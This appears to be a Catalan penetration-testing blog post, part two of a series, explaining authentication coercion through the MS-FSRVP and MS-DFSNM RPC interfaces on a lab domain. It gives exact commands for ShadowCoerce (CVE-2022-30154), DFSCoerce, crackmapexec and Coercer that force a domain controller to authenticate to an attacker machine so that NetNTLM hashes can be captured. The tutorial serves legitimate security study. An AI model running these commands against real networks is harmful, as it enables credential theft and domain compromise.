Coacció | Part II
Compartir
Hola de nou a tots! Tal com vam prometre, continuem amb la saga de Coerce i en aquesta segona part seguim comentant sobre altres RPC vulnerables:
MS-FSRPP
MS-FSRVP És el Remote Procedure Call relacionat amb el protocol de servidor de fitxers remots VSS. S'utilitza per crear còpies de recursos compartits de fitxers en un ordinador remot i per facilitar a les aplicacions de còpia de seguretat la realització de còpies de seguretat coherents amb l'aplicació i la restauració de dades en recursos compartits SMB2.
Cal destacar que, per poder explotar aquesta vulnerabilitat, cal que el servidor tingui habilitat la característica “Servei de l'agent VSS del servidor de fitxers”.
Cal destacar que Microsoft va treure dos pegats de seguretat per a la seva correcció el 14 de juny de 2022.
Verificació
Igual que en el cas de MS-RPRN, per comprovar utilitzem rpcdump d' impacket si el RPC MS-FSRVP està habilitat:
python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRPP'
Cal destacar que hi ha més mètodes per comprovar si aquest RPC està habilitat mitjançant altres eines i tècniques.
Explotació
Després de comprovar que el RPC anomenat “MS-FSRVP” està habilitat a la víctima, a més d'haver compromès un usuari del domini mitjançant altres vies, es procedirà a l'explotació del mateix mitjançant una PoC anomenada com ShadowCoerce la qual té assignada l'identificador CVE -2022-30154 .
Així mateix, per comprovar que es força l'autenticació correctament, farem ús de l'usuari bob amb privilegis limitats al domini dc.corp.lab.
python shadowcoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab
Es pot observar la captura del hash NetNTLM a l'eina Respondre.
MS-DFSNM
MS-DFSNM és el Remote Procedure Call relacionat amb el Sistema de fitxers distribuïts (DFS): Protocol de gestió d'espais de noms. Proporciona una interfície RPC per administrar configuracions DFS.
Verificació
Igual que en el cas de MS-EFSR, farem ús de l'eina crackmapexec , a través de l'execució del mòdul “dfscoerce” i mitjançant l'ús usuari “bob” amb privilegis limitats al domini “dc.corp.lab”, per comprovar si el servidor és o no vulnerable, però aquesta vegada amb un usuari del domini prèviament compromès:
crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "" -M dfscoerce
Cal destacar que hi ha més mètodes per comprovar si aquest RPC està habilitat mitjançant altres eines i tècniques.
Explotació
Després de comprovar que el controlador de domini és vulnerable, es procedirà a l'explotació del mateix mitjançant una PoC anomenada DFSCoerce la qual va ser publicada el juny de 2022.
Així mateix, per comprovar que es força l'autenticació correctament, farem ús de l'usuari bob amb privilegis limitats al domini dc.corp.lab.
python3 dfscoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab
Tots per a un i un per a tots
Coercer és una eina escrita en python que prova múltiples mètodes de realitzar una "Coerce Authentication", a més d'incloure tots els descrits anteriorment.
Té tres modes dexecució, scan, coerce i fuzz. Un exemple d'execució en mode scan seria el següent:
coercer scan -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
Un exemple d'execució en mode coerce seria el següent:
coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"